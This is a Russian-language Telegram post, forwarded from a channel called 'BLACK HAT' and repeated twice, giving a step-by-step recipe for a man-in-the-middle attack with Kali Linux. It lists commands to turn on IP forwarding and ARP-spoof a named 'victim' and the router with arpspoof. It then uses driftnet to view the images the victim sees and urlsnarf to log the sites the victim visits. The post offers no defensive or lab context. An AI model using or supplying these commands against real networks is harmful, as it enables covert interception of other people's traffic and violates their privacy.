Forwarded From BLACK HAT
https://telegra.ph/file/b621edad38cf6bb8187f3.jpgПроводим MITM атаку с помощью Kali Linux!
Перед тем как приступить, Вам необходимо знать имя сетевого интерфейса (установленного на вашем компьютере) и IP-адрес маршрутизатора, обеспечивающего доступ к Wi-Fi. Имя сетевого интерфейса можно легко узнать, использовав команду ifconfig в терминале. IP-адрес маршрутизатора можно получить, введя ip route show
Использование:
▪sysctl -w net.ipv4.ip_forward=1
▪arpspoof -i [Network Interface Name] -t [Victim IP] [Router IP]
▪arpspoof -i [Network Interface Name] -t [Router IP] [Victim IP]
Смотрим изображения с сайтов, которые посещает жертва:
▪driftnet -i [Network Interface Name]
Получаем информацию о сайтах, которые посещает жертва:
▪urlsnarf -i [Network interface name]
После окончания атаки:
▪sysctl -w net.ipv4.ip_forward=0
https://telegra.ph/file/b621edad38cf6bb8187f3.jpgПроводим MITM атаку с помощью Kali Linux!
Перед тем как приступить, Вам необходимо знать имя сетевого интерфейса (установленного на вашем компьютере) и IP-адрес маршрутизатора, обеспечивающего доступ к Wi-Fi. Имя сетевого интерфейса можно легко узнать, использовав команду ifconfig в терминале. IP-адрес маршрутизатора можно получить, введя ip route show
Использование:
▪sysctl -w net.ipv4.ip_forward=1
▪arpspoof -i [Network Interface Name] -t [Victim IP] [Router IP]
▪arpspoof -i [Network Interface Name] -t [Router IP] [Victim IP]
Смотрим изображения с сайтов, которые посещает жертва:
▪driftnet -i [Network Interface Name]
Получаем информацию о сайтах, которые посещает жертва:
▪urlsnarf -i [Network interface name]
После окончания атаки:
▪sysctl -w net.ipv4.ip_forward=0